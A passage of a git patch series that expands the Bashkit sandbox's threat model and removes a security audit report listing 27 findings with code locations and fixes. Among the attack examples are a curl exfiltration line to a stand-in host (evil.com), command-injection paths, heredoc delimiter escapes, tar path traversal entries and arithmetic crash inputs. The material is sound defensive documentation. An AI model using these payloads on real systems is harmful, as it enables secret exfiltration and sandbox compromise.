runtime per sync call (Python) | OS thread/fd exhaustion | Shared runtime | +| TM-PY-023 | Shell injection in deepagents.py | Command injection within VFS | Use shlex.quote() or direct API | +| TM-PY-024 | Heredoc content injection in write() | Command injection within VFS | Random delimiter or direct API | +| TM-PY-025 | GIL deadlock in execute_sync | Python process deadlock | py.allow_threads() | +| TM-ISO-004 | Cross-tenant env pollution via jq | Tenant isolation breach | Same fix as TM-INF-013 | +| TM-ESC-013 | OverlayFs upper() exposes unlimited FS | VFS limit bypass | Restrict upper() visibility | + ### Open (Medium Priority) | Threat ID | Vulnerability | Impact | Recommendation | |-----------|---------------|--------|----------------| | TM-INF-001 | Env vars may leak secrets | Information disclosure | Document caller responsibility | | TM-INJ-008 | Terminal escapes in output | UI manipulation | Document sanitization need | +| TM-INJ-010 | Tar path traversal within VFS | Arbitrary VFS file overwrite | Validate paths stay within extract_base | +| TM-GIT-014 | Git branch name path injection | VFS git repo corruption | Validate branch names | +| TM-INF-014 | Real PID leak via $$ | Host information disclosure | Return virtual PID | +| TM-INF-015 | URL credentials in error messages | Credential leak | Apply URL redaction | ### Accepted (Low Priority) @@ -865,6 +964,7 @@ This section maps former vulnerability IDs to the new threat ID scheme and track |-----------|---------------|--------|-----------| | TM-DOS-011 | Symlinks not followed | Functionality gap | By design - prevents symlink attacks | | TM-DOS-025 | Regex backtracking | CPU exhaustion | Regex crate has internal limits | +| TM-DOS-033 | AWK unbounded loops | CPU exhaustion | 30s timeout backstop | --- @@ -909,6 +1009,21 @@ This section maps former vulnerability IDs to the new threat ID scheme and track | Log value truncation | TM-LOG-007, TM-LOG-008 | `logging.rs` | Yes | | Python resource limits | TM-PY-001 to TM-PY-003 | `builtins/python.rs` | Yes | +### Open Controls (From 2026-03 Security Audit) + +| Finding | Threat IDs | Required Control | Status | +|---------|------------|------------------|--------| +| Wrapping arithmetic | TM-DOS-029 | `wrapping_*` ops, clamp shift/exponent | **NEEDED** | +| VFS limit enforcement on public API | TM-ESC-012, TM-ESC-013 | `validate_path()` + `check_write_limits()` in `add_file()` | **NEEDED** | +| Custom jaq env function | TM-INF-013, TM-ISO-004 | Read from `ctx.env`/`ctx.variables`, not `std::env` | **NEEDED** | +| Internal variable namespace isolation | TM-INJ-009 | Separate HashMap or prefix rejection | **NEEDED** | +| Parser limit propagation | TM-DOS-030 | `Parser::with_limits()` in eval/source/trap/alias | **NEEDED** | +| ExtGlob depth limit | TM-DOS-031 | Depth parameter in `glob_match_impl` | **NEEDED** | +| Python wrapper input sanitization | TM-PY-023, TM-PY-024 | `shlex.quote()` or direct VFS API | **NEEDED** | +| Tar path validation | TM-INJ-010 | Check resolved path starts with extract_base | **NEEDED** | +| Git branch name validation | TM-GIT-014 | Reject `..`, control chars, trailing `.lock` | **NEEDED** | +| GIL release in execute_sync | TM-PY-025 | `py.allow_threads()` wrapper | **NEEDED** | + --- ## Recommended Limits for Production @@ -1110,6 +1225,22 @@ events that BashKit intercepts and dispatches to the VFS. | TM-PY-020 | Network access from Python | Critical | Monty has no socket/network module | `threat_python_vfs_no_network` | | TM-PY-021 | VFS mkdir escape | Medium | mkdir operates only in VFS | `threat_python_vfs_mkdir_sandboxed` | | TM-PY-022 | Parser/VM crash kills host | Critical | Parser depth limit (since 0.0.4) prevents parser crashes; Monty runs in-process with resource limits | — (removed: subprocess tests no longer applicable) | +| TM-PY-023 | Shell injection in Python wrapper | High | Python `BashkitBackend` (deepagents.py) uses f-string interpolation for shell commands | **OPEN** | +| TM-PY-024 | Heredoc content injection | High | `write()` uses fixed `BASHKIT_EOF` delimiter; content containing it escapes heredoc | **OPEN** | +| TM-PY-025 | GIL deadlock in execute_sync | High | `execute_sync()` calls `rt.block_on()` without releasing GIL; tool callbacks reacquire GIL | **OPEN** | + +**TM-PY-023**: `crates/bashkit-python/bashkit/deepagents.py` constructs shell commands via f-string +interpolation of user-supplied paths/content (lines 187, 198, 206, 230, 258, 278, 302). Paths +like `/dev/null; echo pwned > /file` execute injected commands. Fix: use `shlex.quote()` or +expose direct VFS methods. + +**TM-PY-024**: The `write()` method uses `cat > {file_path} << 'BASHKIT_EOF'\n{content}\nBASHKIT_EOF`. +Content containing `BASHKIT_EOF` on its own line terminates the heredoc early, executing remaining +text as shell commands. Fix: random delimiter suffix or direct write API. + +**TM-PY-025**: `crates/bashkit-python/src/lib.rs:510-527` calls `rt.block_on()` while holding the +GIL. Tool callbacks call `Python::attach()` to reacquire. Can deadlock in multi-threaded Python. +Fix: wrap with `py.allow_threads(|| { ... })`. ### VFS Bridge Security Properties From a99c8fe4f8c53f562d74b6f8b4343fa402d69bf7 Mon Sep 17 00:00:00 2001 From: Claude Date: Sun, 1 Mar 2026 01:27:33 +0000 Subject: [PATCH 3/4] chore(specs): add 12 missing threat IDs for all audit findings Ensure every finding in SECURITY_AUDIT.md has a corresponding threat model entry. Added: - TM-DOS-034 to TM-DOS-040: TOCTOU, OverlayFs gaps, validate_path, 32-bit - TM-ESC-014: custom builtins lost after first call - TM-INJ-011: cyclic nameref silent resolution - TM-INF-016: error message info leaks - TM-PY-026: reset() discards config - TM-PY-027: JSON conversion unbounded recursion Updated vulnerability summary and open controls matrix in both specs/006-threat-model.md and public docs/threat-model.md. https://claude.ai/code/session_011wB794wXwA9BMoj1sFKtrE --- crates/bashkit/docs/threat-model.md | 8 +++ specs/006-threat-model.md | 85 ++++++++++++++++++++++++++++- 2 files changed, 92 insertions(+), 1 deletion(-) diff --git a/crates/bashkit/docs/threat-model.md b/crates/bashkit/docs/threat-model.md index 61bf2f69..d2558d8a 100644 --- a/crates/bashkit/docs/threat-model.md +++ b/crates/bashkit/docs/threat-model.md @@ -36,6 +36,9 @@ through configurable limits. | Parser attack (TM-DOS-024) | Malformed input | `parser_timeout` | [`limits.rs`][limits] | | Filesystem bomb (TM-DOS-007) | Zip bomb extraction | `FsLimits` | [`fs/limits.rs`][fslimits] | | Many files (TM-DOS-006) | Create 1M files | `max_file_count` | [`fs/limits.rs`][fslimits] | +| TOCTOU append (TM-DOS-034) | Concurrent appends bypass limits | Single write lock | **OPEN** | +| OverlayFs limit gaps (TM-DOS-035-038) | CoW/whiteout/accounting bugs | Combined limit accounting | **OPEN** | +| Missing validate_path (TM-DOS-039) | VFS methods skip path checks | Add to all methods | **OPEN** | | Diff algorithm DoS (TM-DOS-028) | `diff` on large unrelated files | LCS matrix cap (10M cells) | [`builtins/diff.rs`][diff] | | Arithmetic overflow (TM-DOS-029) | `$(( 2 ** -1 ))` | Use wrapping arithmetic | **OPEN** | | Parser limit bypass (TM-DOS-030) | eval/source ignore limits | Use `Parser::with_limits()` | **OPEN** | @@ -78,6 +81,7 @@ Scripts may attempt to break out of the sandbox to access the host system. | External commands (TM-ESC-006) | `./malicious` | No external exec | Returns exit 127 | | eval injection (TM-ESC-008) | `eval "$input"` | Sandboxed eval | Only runs builtins | | VFS limit bypass (TM-ESC-012) | `add_file()` skips limits | Restrict API visibility | **OPEN** | +| Custom builtins lost (TM-ESC-014) | `std::mem::take` empties builtins | Clone/Arc builtins | **OPEN** | **Virtual Filesystem:** @@ -108,6 +112,7 @@ Scripts may attempt to leak sensitive information. | Network exfil (TM-INF-010) | `curl evil.com?d=$SECRET` | Network allowlist | [`network/allowlist.rs`][allowlist] | | Host env via jq (TM-INF-013) | jq `env` exposes host env | Custom env impl | **OPEN** | | Real PID leak (TM-INF-014) | `$$` returns real PID | Return virtual value | **OPEN** | +| Error msg info leak (TM-INF-016) | Errors expose host paths/IPs | Sanitize error messages | **OPEN** | **Caller Responsibility (TM-INF-001):** @@ -204,6 +209,7 @@ exfiltration by encoding secrets in subdomains (`curl https://$SECRET.example.co | Terminal escapes (TM-INJ-008) | ANSI sequences in output | Caller should sanitize | | Internal var injection (TM-INJ-009) | Set `_READONLY_X=""` | Isolate internal namespace | **OPEN** | | Tar path traversal (TM-INJ-010) | `tar -xf` with `../` entries | Validate extract paths | **OPEN** | +| Cyclic nameref (TM-INJ-011) | Cyclic refs resolve silently | Detect cycle, error | **OPEN** | **Variable Expansion:** @@ -342,6 +348,8 @@ Python `pathlib.Path` operations are bridged to Bashkit's virtual filesystem. | Shell injection (TM-PY-023) | deepagents.py f-strings | Use shlex.quote() | **OPEN** | | Heredoc escape (TM-PY-024) | Content contains delimiter | Random delimiter | **OPEN** | | GIL deadlock (TM-PY-025) | execute_sync holds GIL | py.allow_threads() | **OPEN** | +| Config lost on reset (TM-PY-026) | reset() drops limits | Preserve config | **OPEN** | +| JSON recursion (TM-PY-027) | Nested dicts overflow stack | Add depth limit | **OPEN** | **Architecture:** diff --git a/specs/006-threat-model.md b/specs/006-threat-model.md index 9f61abd0..ea553f13 100644 --- a/specs/006-threat-model.md +++ b/specs/006-threat-model.md @@ -120,8 +120,39 @@ the session-level backstop. | TM-DOS-008 | Tar bomb | `tar -xf bomb.tar` (many files / large files) | FS limits | **MITIGATED** | | TM-DOS-009 | Recursive copy | `cp -r /tmp /tmp/copy` | FS limits | **MITIGATED** | | TM-DOS-010 | Append flood | `while true; do echo x >> file; done` | FS limits + loop limit | **MITIGATED** | +| TM-DOS-034 | TOCTOU in append_file | Concurrent appends between read-lock and write-lock bypass size checks | — | **OPEN** | +| TM-DOS-035 | OverlayFs limit check upper-only | `check_write_limits()` ignores lower layer usage, allowing combined usage to exceed limits | — | **OPEN** | +| TM-DOS-036 | OverlayFs usage double-count | `compute_usage()` double-counts overwritten/whited-out files | — | **OPEN** | +| TM-DOS-037 | OverlayFs chmod CoW bypass | `chmod` copy-on-write writes to unlimited upper layer, bypassing overlay limits | — | **OPEN** | +| TM-DOS-038 | OverlayFs incomplete recursive whiteout | `rm -r /dir` only whiteouts directory, not children; lower layer files remain visible | — | **OPEN** | +| TM-DOS-039 | Missing validate_path in VFS methods | `remove`, `stat`, `read_dir`, `copy`, `rename`, `symlink`, `chmod` skip `validate_path()` | — | **OPEN** | +| TM-DOS-040 | Integer truncation on 32-bit | `u64 as usize` casts in network/Python bindings silently truncate on 32-bit, bypassing size checks | — | **OPEN** | -**Current Risk**: LOW - Filesystem limits prevent unbounded memory consumption +**TM-DOS-034**: `InMemoryFs::append_file()` (line 816-896) reads under a read lock, drops it, +checks limits with stale data, then acquires write lock. Fix: single write lock for whole operation. + +**TM-DOS-035**: `OverlayFs::check_write_limits()` (line 263-293) checks only upper layer bytes. +With 80MB in lower and 100MB limit, upper gets another full 100MB (180MB total). Fix: use +`compute_usage()` for combined accounting. + +**TM-DOS-036**: `OverlayFs::compute_usage()` (line 246-259) sums upper + lower without deducting +overwritten or whited-out files. Causes premature limit rejections. Fix: subtract overrides. + +**TM-DOS-037**: `OverlayFs::chmod()` (line 610-638) triggers copy-on-write directly to `self.upper` +which has `FsLimits::unlimited()`. Fix: route through `check_write_limits()`. + +**TM-DOS-038**: `OverlayFs::remove()` (line 456-484) whiteouts directory path only. +`is_whiteout()` uses exact match so `/dir/file.txt` stays visible from lower layer. Fix: check +ancestor whiteouts in `is_whiteout()`. + +**TM-DOS-039**: `validate_path()` only called in `read_file`, `write_file`, `append_file`, `mkdir`. +Missing from `remove`, `stat`, `read_dir`, `exists`, `rename`, `copy`, `symlink`, `read_link`, +`chmod`. `copy()` also skips `check_write_limits()`. Fix: add validation to all path-accepting methods. + +**TM-DOS-040**: `network/client.rs:236,419` and `bashkit-python/src/lib.rs:197,200` cast `u64` to +`usize`. On 32-bit, `Content-Length: 5GB` truncates to ~1GB. Fix: use `usize::try_from()`. + +**Current Risk**: MEDIUM - OverlayFs limit accounting has multiple gaps (TM-DOS-034 to TM-DOS-039) **Implementation**: `FsLimits` struct in `fs/limits.rs`: ```rust @@ -273,6 +304,7 @@ max_parser_operations: 100_000, // Parser fuel (TM-DOS-024) | TM-ESC-012 | VFS limit bypass via public API | `add_file()` / `restore()` skip `validate_path()` and `check_write_limits()` | — | **OPEN** | | TM-ESC-013 | OverlayFs upper() exposes unlimited FS | `OverlayFs::upper()` returns `InMemoryFs` with `FsLimits::unlimited()` | — | **OPEN** | +| TM-ESC-014 | BashTool custom builtins lost after first call | `std::mem::take` empties builtins on first `execute()`, removing security wrappers | — | **OPEN** | **TM-ESC-012**: `InMemoryFs::add_file()` is `pub` and does not call `validate_path()` or `check_write_limits()`. `restore()` deserializes without validation. Any code with `InMemoryFs` @@ -282,6 +314,10 @@ access can bypass all limits. Fix: add limit checks or restrict visibility to `p write unlimited data via `overlay.upper().write_file()`. Fix: don't expose `upper()` publicly, or return a view that enforces the overlay's limits. +**TM-ESC-014**: `BashTool::create_bash()` (`tool.rs:456`) uses `std::mem::take(&mut self.builtins)`, +emptying the builtin map on first `execute()`. Subsequent calls get no custom builtins. If custom +builtins enforce security wrappers, those are silently removed. Fix: clone or use `Arc`. + #### 2.2 Process Escape | ID | Threat | Attack Vector | Mitigation | Status | @@ -343,6 +379,7 @@ All execution stays within the virtual interpreter — no OS subprocess is spawn | TM-INF-013 | Host env leak via jq | jq builtin calls `std::env::set_var()`, exposing host process env vars | — | **OPEN** | | TM-INF-014 | Real PID leak via $$ | `$$` returns `std::process::id()` instead of virtual value | — | **OPEN** | | TM-INF-015 | URL credentials in errors | Allowlist "blocked" error echoes full URL including credentials | — | **OPEN** | +| TM-INF-016 | Internal state in error messages | `std::io::Error`, reqwest errors, Debug-formatted errors leak host paths/IPs/TLS info | — | **OPEN** | **TM-INF-013**: The jq builtin (`builtins/jq.rs:414-421`) calls `std::env::set_var()` to expose shell variables to jaq's `env` function. This also makes host process env vars (API keys, tokens) @@ -355,6 +392,12 @@ host PID. All other system builtins return virtual values. Fix: return fixed or **TM-INF-015**: `network/allowlist.rs:144` echoes full URL in error messages, potentially including `user:pass@` in the authority. Fix: apply `LogConfig::redact_url()` to URLs in errors. +**TM-INF-016**: Multiple error paths leak internal details: `error.rs:38` wraps `std::io::Error` +(may include host paths), `network/client.rs:224` wraps reqwest errors (resolved IPs, TLS info), +`git/client.rs` includes VFS paths and remote URLs, `scripted_tool/execute.rs:323` uses `{:?}` +(Debug format) while `BashTool` uses `error_kind()` — inconsistent. Fix: use Display format +consistently, wrap external errors with sanitized messages. + **Current Risk**: MEDIUM - Caller must sanitize environment variables; jq leaks host env **Caller Responsibility** (TM-INF-001): Do NOT pass sensitive env vars: @@ -422,6 +465,12 @@ Bash::builder() | TM-INJ-009 | Internal variable namespace injection | Set `_NAMEREF_`, `_READONLY_`, etc. directly | — | **OPEN** | +| TM-INJ-011 | Cyclic nameref silent resolution | Cyclic namerefs (a→b→a) silently resolve after 10 iterations instead of erroring | — | **OPEN** | + +**TM-INJ-011**: `interpreter/mod.rs:7547-7560` — cyclic namerefs silently resolve to whatever +variable is current after 10 iterations. Real bash errors with `circular name reference`. Can +be exploited to read/write unintended variables. Fix: detect cycles (track visited names), error. + **TM-INJ-009**: The interpreter uses magic variable prefixes as internal control signals: `_NAMEREF_` (nameref), `_READONLY_` (readonly), `_SHIFT_COUNT`, `_SET_POSITIONAL`, `_UPPER_`, `_LOWER_`. User scripts can set these directly to bypass readonly @@ -957,6 +1006,18 @@ This section maps former vulnerability IDs to the new threat ID scheme and track | TM-GIT-014 | Git branch name path injection | VFS git repo corruption | Validate branch names | | TM-INF-014 | Real PID leak via $$ | Host information disclosure | Return virtual PID | | TM-INF-015 | URL credentials in error messages | Credential leak | Apply URL redaction | +| TM-INF-016 | Internal state in error messages | Info leak (paths, IPs, TLS) | Consistent Display format | +| TM-DOS-034 | TOCTOU in append_file | VFS size limit bypass | Single write lock | +| TM-DOS-035 | OverlayFs limit check upper-only | Combined size limit bypass | Use compute_usage() | +| TM-DOS-036 | OverlayFs usage double-count | Premature limit rejections | Subtract overrides | +| TM-DOS-037 | OverlayFs chmod CoW bypass | Limit bypass via chmod | Route through check_write_limits | +| TM-DOS-038 | OverlayFs incomplete whiteout | Deleted files remain visible | Check ancestor whiteouts | +| TM-DOS-039 | Missing validate_path in VFS | Path validation gaps | Add to all methods | +| TM-ESC-014 | Custom builtins lost after first call | Security wrappers silently removed | Clone or Arc builtins | +| TM-PY-026 | reset() discards security config | DoS protections removed | Preserve config on reset | +| TM-INJ-011 | Cyclic nameref silent resolution | Read/write unintended variables | Detect cycles, error | +| TM-PY-027 | py_to_json unbounded recursion | Stack overflow | Add depth counter | +| TM-DOS-040 | Integer truncation on 32-bit | Size check bypass | Use try_from() | ### Accepted (Low Priority) @@ -1023,6 +1084,17 @@ This section maps former vulnerability IDs to the new threat ID scheme and track | Tar path validation | TM-INJ-010 | Check resolved path starts with extract_base | **NEEDED** | | Git branch name validation | TM-GIT-014 | Reject `..`, control chars, trailing `.lock` | **NEEDED** | | GIL release in execute_sync | TM-PY-025 | `py.allow_threads()` wrapper | **NEEDED** | +| TOCTOU fix in append_file | TM-DOS-034 | Single write lock for read-check-write | **NEEDED** | +| OverlayFs combined limit accounting | TM-DOS-035, TM-DOS-036 | Use combined usage for limit checks, subtract overrides | **NEEDED** | +| OverlayFs chmod CoW limits | TM-DOS-037 | Route copy-on-write through `check_write_limits()` | **NEEDED** | +| OverlayFs recursive whiteout | TM-DOS-038 | Check ancestor whiteouts in `is_whiteout()` | **NEEDED** | +| VFS-wide path validation | TM-DOS-039 | `validate_path()` in all path-accepting methods | **NEEDED** | +| Custom builtin preservation | TM-ESC-014 | Clone builtins instead of `std::mem::take` | **NEEDED** | +| Python config preservation on reset | TM-PY-026 | Store and reapply builder config | **NEEDED** | +| JSON conversion depth limit | TM-PY-027 | Depth counter in `py_to_json`/`json_to_py` | **NEEDED** | +| Cyclic nameref detection | TM-INJ-011 | Track visited names, emit error on cycle | **NEEDED** | +| Error message sanitization gaps | TM-INF-016 | Consistent Display format, wrap external errors | **NEEDED** | +| 32-bit integer safety | TM-DOS-040 | `usize::try_from()` for `u64` casts | **NEEDED** | --- @@ -1242,6 +1314,17 @@ text as shell commands. Fix: random delimiter suffix or direct write API. GIL. Tool callbacks call `Python::attach()` to reacquire. Can deadlock in multi-threaded Python. Fix: wrap with `py.allow_threads(|| { ... })`. +| TM-PY-026 | reset() discards security config | `BashTool.reset()` creates new `Bash` with bare builder, dropping all configured limits | — | **OPEN** | +| TM-PY-027 | Unbounded recursion in JSON conversion | `py_to_json`/`json_to_py` recurse without depth limit on nested dicts/lists | — | **OPEN** | + +**TM-PY-026**: `crates/bashkit-python/src/lib.rs:260-271` — `reset()` creates `Bash::builder().build()` +without reapplying `max_commands`, `max_loop_iterations`, `username`, `hostname`. After reset, +DoS protections are silently removed. Fix: store original config and reapply. + +**TM-PY-027**: `crates/bashkit-python/src/lib.rs:58-92` — `py_to_json` and `json_to_py` recurse +on nested Python dicts/lists with no depth counter. Deeply nested structures cause stack overflow. +Fix: add depth counter, fail beyond 64 levels. + ### VFS Bridge Security Properties 1. **No real filesystem access**: All Path operations go through BashKit's VFS. From f4acefc6082c256268239b100694802e460b4295 Mon Sep 17 00:00:00 2001 From: Claude Date: Sun, 1 Mar 2026 04:26:49 +0000 Subject: [PATCH 4/4] chore: remove SECURITY_AUDIT.md All 27 findings are now tracked in GitHub issues (#405-#431) with severity labels, and all threat model IDs are in specs/006-threat-model.md. The file is no longer needed. https://claude.ai/code/session_011wB794wXwA9BMoj1sFKtrE --- SECURITY_AUDIT.md | 370 ---------------------------------------------- 1 file changed, 370 deletions(-) delete mode 100644 SECURITY_AUDIT.md diff --git a/SECURITY_AUDIT.md b/SECURITY_AUDIT.md deleted file mode 100644 index d11f649e..00000000 --- a/SECURITY_AUDIT.md +++ /dev/null @@ -1,370 +0,0 @@ -# Bashkit Security Audit Report - -**Date:** 2026-03-01 -**Scope:** Full codebase (Rust core + Python bindings) -**Methodology:** Manual code review of all security-sensitive components - ---- - -## Executive Summary - -Bashkit demonstrates a strong security architecture overall. The virtual filesystem provides genuine isolation, the network allowlist is default-deny, resource limits are comprehensive, and there is zero `unsafe` Rust code. The threat model (`specs/006-threat-model.md`) is thorough and most documented threats are properly mitigated. - -However, this audit identified **27 security findings** across 5 severity levels: - -| Severity | Count | Key Themes | -|----------|-------|------------| -| CRITICAL | 2 | Arithmetic panic/DoS, VFS limit bypass via public API | -| HIGH | 8 | Internal variable namespace injection, parser limit bypass, extglob DoS, process env pollution, shell injection in Python wrappers | -| MEDIUM | 10 | TOCTOU in VFS, tar path traversal, OverlayFs limit inconsistencies, GIL deadlock risk | -| LOW | 7 | PID leak, error message info leaks, integer truncation on 32-bit | - ---- - -## CRITICAL Findings - -### C-1: Integer Overflow / Panic in Arithmetic Exponentiation - -**File:** `crates/bashkit/src/interpreter/mod.rs:7444` - -```rust -return left.pow(right as u32); -``` - -`right` is `i64`. Casting to `u32` silently wraps negatives (e.g., `-1` becomes `4294967295`). Calling `i64::pow()` with a large exponent causes a panic in debug builds or massive CPU hang in release. Even `$(( 2 ** 63 ))` overflows `i64`. - -**Attack:** `$(( 2 ** -1 ))` or `$(( 2 ** 999999999999 ))` crashes or hangs the interpreter. - -**Related:** Shift operators at lines 7343/7353 (`left << right`, `left >> right`) panic if `right >= 64` or `right < 0`. All standard arithmetic (`+`, `-`, `*`) at lines 7379-7407 panics on overflow in debug. Division `i64::MIN / -1` at line 7413 panics (not caught by the `right != 0` check). - -**Fix:** -```rust -// Exponentiation -let exp = right.clamp(0, 63) as u32; -return left.wrapping_pow(exp); - -// Shifts -let shift = right.clamp(0, 63) as u32; -return left.wrapping_shl(shift); - -// All arithmetic: use wrapping_add, wrapping_sub, wrapping_mul -// Division: check left == i64::MIN && right == -1 -``` - -### C-2: `add_file()` and `restore()` Bypass All VFS Limits - -**File:** `crates/bashkit/src/fs/memory.rs:658-698` (add_file), `549-603` (restore) - -`InMemoryFs::add_file()` is a `pub` method that: -- Does NOT call `validate_path()` (no path depth/length/unicode checks) -- Does NOT call `check_write_limits()` (no file size, total bytes, or file count checks) - -Any code with access to `InMemoryFs` (including via `OverlayFs::upper()`) can bypass all filesystem limits. - -Similarly, `restore()` deserializes a `VfsSnapshot` and inserts all entries without any validation or limit checks. - -**Compounding factor:** `OverlayFs::upper()` (line 241) returns `&InMemoryFs` with `FsLimits::unlimited()`, so calling `overlay.upper().add_file(...)` or `overlay.upper().write_file(...)` trivially bypasses all OverlayFs-level limits. - -**Fix:** `add_file()` should call `validate_path()` and `check_write_limits()`. Alternatively, make it `pub(crate)` or document it is only safe during construction. `OverlayFs::upper()` should not be public, or should return a limited view. - ---- - -## HIGH Findings - -### H-1: Internal Variable Namespace Injection - -**File:** `crates/bashkit/src/interpreter/mod.rs` (various locations) - -The interpreter uses magic variable prefixes as internal control signals: -- `_NAMEREF_` (line 7549): nameref resolution -- `_READONLY_` (line 5333): readonly enforcement -- `_SHIFT_COUNT` (line 4255): positional parameter shifting -- `_SET_POSITIONAL` (line 4268): positional parameter replacement -- `_UPPER_`, `_LOWER_` (line 7517): case conversion - -A user script can set these directly: -```bash -_READONLY_PATH="" # Bypass readonly protection -_NAMEREF_x="PATH" # Create unauthorized nameref -_SHIFT_COUNT=100 # Manipulate builtins -``` - -`${!_NAMEREF_*}` (PrefixMatch at line 6034) also exposes all internal variables. - -**Fix:** Use a separate `HashMap` for internal state, or reject user assignments to names starting with `_NAMEREF_`, `_READONLY_`, etc. Filter internal names from `${!prefix*}` results. - -### H-2: Parser Limits Bypassed via `eval`, `source`, Traps, Aliases - -**File:** `crates/bashkit/src/interpreter/mod.rs` - -Multiple code paths create `Parser::new()` which ignores the interpreter's configured limits: -- `source` command (line 4548): `Parser::new(&content)` -- `eval` command (line 4613): `Parser::new(&cmd)` -- Alias expansion (line 3627): `Parser::new(&expanded_cmd)` -- EXIT trap (line 697): `Parser::new(&trap_cmd).parse()` -- ERR trap (line 7795): `Parser::new(&trap_cmd).parse()` - -If the interpreter was configured with stricter `max_ast_depth` or `max_parser_operations`, these paths silently use defaults. - -**Fix:** Use `Parser::with_limits()` everywhere, propagating `self.limits.max_ast_depth` and `self.limits.max_parser_operations`. - -### H-3: Unbounded Recursion in ExtGlob Matching - -**File:** `crates/bashkit/src/interpreter/mod.rs:3043-3092` - -The `+(...)` and `*(...)` extglob handlers recursively call `glob_match_impl` without any depth limit. For each split point in the string, the function recurses with a reconstructed pattern, creating O(n!) time complexity. - -**Attack:** Pattern `+(a|aa)` against a long string of `a`s causes exponential time/stack overflow. - -**Fix:** Add a depth parameter to `glob_match_impl` and `match_extglob`, and bail when exceeded. - -### H-4: Process Environment Pollution in `jq` Builtin (Thread-Unsafe) - -**File:** `crates/bashkit/src/builtins/jq.rs:414-421` - -```rust -std::env::set_var(k, v); // Modifies real process env -``` - -The jq builtin calls `std::env::set_var()` to expose shell variables to jaq's `env` function. This is: -1. **Thread-unsafe:** `set_var` is unsound in multi-threaded contexts (flagged `unsafe` in Rust 2024 edition) -2. **Info leak:** Host process env vars (API keys, tokens) become visible via jaq's `env` -3. **Race condition:** Concurrent jq calls corrupt each other's env state - -**Fix:** Provide a custom `env` implementation to jaq that reads from `ctx.env`/`ctx.variables`, or add a mutex around the env block. - -### H-5: Shell Injection in Python `BashkitBackend` (deepagents.py) - -**File:** `crates/bashkit-python/bashkit/deepagents.py` (lines 187, 198, 206, 230, 258, 278, 302) - -Multiple methods construct shell commands via f-string interpolation of user-supplied paths and content: - -```python -result = self._bash.execute_sync(f"cat {file_path}") # path injection -cmd = f"cat > {file_path} << 'BASHKIT_EOF'\n{content}\nBASHKIT_EOF" # heredoc escape -cmd = f"grep -rn '{pattern}' {path}" # pattern injection -``` - -A path like `"/dev/null; echo pwned > /important/file"` executes injected commands within the VFS. Content containing the literal `BASHKIT_EOF` delimiter terminates the heredoc early, causing remaining text to execute as shell commands. - -**Fix:** Use `shlex.quote()` for all interpolated values, or expose direct VFS methods from Rust that bypass shell parsing. - -### H-6: Heredoc Content Injection in `BashkitBackend.write()` - -**File:** `crates/bashkit-python/bashkit/deepagents.py:198` - -Specific variant of H-5. Content containing `BASHKIT_EOF` on its own line terminates the heredoc. Everything after becomes shell commands within the VFS. - -**Fix:** Use a random delimiter suffix or expose a direct write API. - -### H-7: GIL Deadlock Risk in `execute_sync` - -**File:** `crates/bashkit-python/src/lib.rs:510-527` - -`execute_sync()` calls `rt.block_on()` without releasing the GIL. Inside that, tool callbacks call `Python::attach()` to reacquire the GIL. While PyO3 handles same-thread reentrance, this can deadlock in multi-threaded Python scenarios. - -**Fix:** Wrap `rt.block_on()` with `py.allow_threads(|| { ... })`. - -### H-8: Tokio Runtime Created Per Sync Call (Resource Exhaustion) - -**File:** `crates/bashkit-python/src/lib.rs:237-258, 261-271, 510-527` - -Each `execute_sync()` and `reset()` creates a new `tokio::runtime::Runtime`, spawning OS threads. Under rapid-fire calls (e.g., from an LLM agent loop), this exhausts OS thread/fd limits. - -**Fix:** Use a shared runtime stored in the struct, or use `Builder::new_current_thread()`. - ---- - -## MEDIUM Findings - -### M-1: TOCTOU Race in `InMemoryFs::append_file()` - -**File:** `crates/bashkit/src/fs/memory.rs:816-896` - -`append_file()` reads file state under a read lock, drops it, checks limits with stale data, then acquires a write lock. Another thread can modify the file between locks, making size checks inaccurate. - -**Fix:** Use a single write lock for the entire operation, or re-check size after acquiring the write lock. - -### M-2: Tar Path Traversal Within VFS - -**File:** `crates/bashkit/src/builtins/archive.rs:538, 560` - -Tar entry names like `../../../etc/passwd` are passed to `resolve_path()` which normalizes `..` but still writes to arbitrary VFS locations outside the extraction directory. - -**Fix:** Validate that the resolved path starts with `extract_base`. Reject entries with `..` or leading `/`. - -### M-3: `OverlayFs::chmod` Copy-on-Write Bypasses Limits - -**File:** `crates/bashkit/src/fs/overlay.rs:610-638` - -When `chmod` triggers copy-on-write from the lower layer, it writes directly to `self.upper` (unlimited InMemoryFs), bypassing `OverlayFs::check_write_limits()`. - -### M-4: `OverlayFs` Usage Double-Counts Files - -**File:** `crates/bashkit/src/fs/overlay.rs:246-259` - -`compute_usage()` sums upper + lower layer usage without deducting overwritten or whited-out files. This makes `usage()` inaccurate and can cause premature limit rejections. - -### M-5: `OverlayFs::check_write_limits` Checks Only Upper Layer - -**File:** `crates/bashkit/src/fs/overlay.rs:263-293` - -Total bytes checked against upper layer only. If the lower layer has 80MB and the combined limit is 100MB, the upper layer is allowed another full 100MB (total: 180MB). - -### M-6: Incomplete Recursive Delete Whiteout in `OverlayFs` - -**File:** `crates/bashkit/src/fs/overlay.rs:456-484` - -`rm -r /dir` only whiteouts the directory path, not child files. `is_whiteout()` uses exact path matching, so `/dir/file.txt` remains visible after deleting `/dir`. - -### M-7: Missing Path Validation Across Multiple VFS Methods - -**Files:** `crates/bashkit/src/fs/memory.rs`, `overlay.rs`, `mountable.rs`, `posix.rs` - -`validate_path()` is only called in `read_file`, `write_file`, `append_file`, and `mkdir` within `InMemoryFs`. Missing from: `remove`, `stat`, `read_dir`, `exists`, `rename`, `copy`, `symlink`, `read_link`, `chmod`. - -`copy()` is particularly notable: it creates a new entry without checking write limits, enabling file count and total bytes bypass. - -`PosixFs` and `MountableFs` never call `validate_path()` at all. - -### M-8: `BashTool::create_bash()` Loses Custom Builtins After First Call - -**File:** `crates/bashkit/src/tool.rs:456` - -```rust -for (name, builtin) in std::mem::take(&mut self.builtins) { -``` - -`std::mem::take` empties `self.builtins`. The first `execute()` gets all custom builtins; subsequent calls get none. If custom builtins enforce security wrappers, those are silently removed. - -### M-9: Git Branch Name Path Injection - -**File:** `crates/bashkit/src/git/client.rs:1035, 1080, 1119` - -Branch names are used directly in `Path::join()` without validation. `branch_create(name="../../config")` could overwrite `.git/config` within the VFS. - -**Fix:** Validate branch names against git's ref name rules (no `..`, no control chars, no trailing `.lock`). - -### M-10: `reset()` Discards Security Configuration - -**File:** `crates/bashkit-python/src/lib.rs:260-271` - -`BashTool.reset()` creates a new `Bash` with bare `Bash::builder()`, discarding `max_commands`, `max_loop_iterations`, `username`, and 